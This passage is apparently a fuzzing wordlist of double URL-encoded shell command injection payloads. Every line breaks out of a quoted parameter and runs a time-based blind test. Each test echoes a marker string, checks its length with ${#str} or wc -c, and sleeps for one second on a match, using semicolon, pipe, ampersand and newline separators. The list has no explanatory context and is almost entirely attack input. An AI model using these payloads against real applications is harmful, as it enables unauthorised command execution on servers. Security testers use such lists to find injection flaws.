0%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20TFJKCP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZTQVNM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20BAKSIN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20XHMATL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OLUGPB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20ZDDHYL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EZDZJG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%0A%20str%3D%24%28echo%20NNEAQO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%3B%20str%3D%24%28echo%20RNIVNR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%